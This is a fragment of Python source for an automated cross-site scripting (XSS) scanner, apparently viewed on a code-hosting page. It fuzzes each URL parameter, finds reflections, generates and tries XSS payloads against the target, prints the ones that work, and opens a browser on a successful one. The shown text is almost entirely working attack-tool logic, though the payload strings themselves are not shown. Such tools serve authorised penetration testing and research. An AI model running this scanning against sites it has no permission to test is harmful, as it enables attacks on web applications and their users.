print ('%s WAF Status: %sOffline%s' % (good, green, end))
|
||||
|
||||
if fuzz:
|
||||
for paramName in params.keys():
|
||||
print ('%s Fuzzing parameter: %s' % (info, paramName))
|
||||
paramsCopy = copy.deepcopy(params)
|
||||
paramsCopy[paramName] = xsschecker
|
||||
fuzzer(url, paramsCopy, headers, GET, delay, WAF)
|
||||
quit()
|
||||
|
||||
for paramName in params.keys():
|
||||
paramsCopy = copy.deepcopy(params)
|
||||
print ('%s Testing parameter: %s' % (info, paramName))
|
||||
paramsCopy[paramName] = xsschecker
|
||||
response = requester(url, paramsCopy, headers, GET, delay).text
|
||||
occurences = htmlParser(response)
|
||||
if not occurences:
|
||||
print ('%s No reflection found' % bad)
|
||||
continue
|
||||
else:
|
||||
print ('%s Reflections found: %s' % (info, len(occurences)))
|
||||
print ('%s Analysing reflections' % run)
|
||||
efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences)
|
||||
print ('%s Generating payloads' % run)
|
||||
vectors = generator(occurences, response)
|
||||
total = 0
|
||||
for v in vectors.values():
|
||||
total += len(v)
|
||||
if total == 0:
|
||||
print ('%s No vectors were crafted' % bad)
|
||||
continue
|
||||
print ('%s Payloads generated: %i' % (info, total))
|
||||
progress = 0
|
||||
for confidence, vects in vectors.items():
|
||||
for vect in vects:
|
||||
progress += 1
|
||||
print ('%s Payloads tried [%i/%i]' % (run, progress, total), end='\r')
|
||||
if not GET:
|
||||
vect = unquote(vect)
|
||||
efficiencies = checker(url, paramsCopy, headers, GET, delay, vect)
|
||||
if not efficiencies:
|
||||
for i in range(len(occurences)):
|
||||
efficiencies.append(0)
|
||||
bestEfficiency = max(efficiencies)
|
||||
if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
|
||||
print (('%s-%s' % (red, end)) * 60)
|
||||
print ('%s Payload: %s' % (good, vect))
|
||||
print ('%s Efficiency: %i' % (info, bestEfficiency))
|
||||
print ('%s Cofidence: %i' % (info, confidence))
|
||||
if GET:
|
||||
flatParams = flattenParams(paramName, paramsCopy, vect)
|
||||
if '"' not in flatParams and '}' not in flatParams:
|
||||
webbrowser.open(url + flatParams)
|
||||
choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
|
||||
if choice != 'y':
|
||||
quit()
|
||||
elif bestEfficiency > minEfficiency:
|
||||
print (('%s-%s' % (red, end)) * 60)
|
||||
print ('%s Payload: %s' % (good, vect))
|
||||
print ('%s Efficiency: %i' % (info, bestEfficiency))
|
||||
print ('%s Cofidence: %i' % (info, confidence))
|
||||
Reference in New Issue
Block a user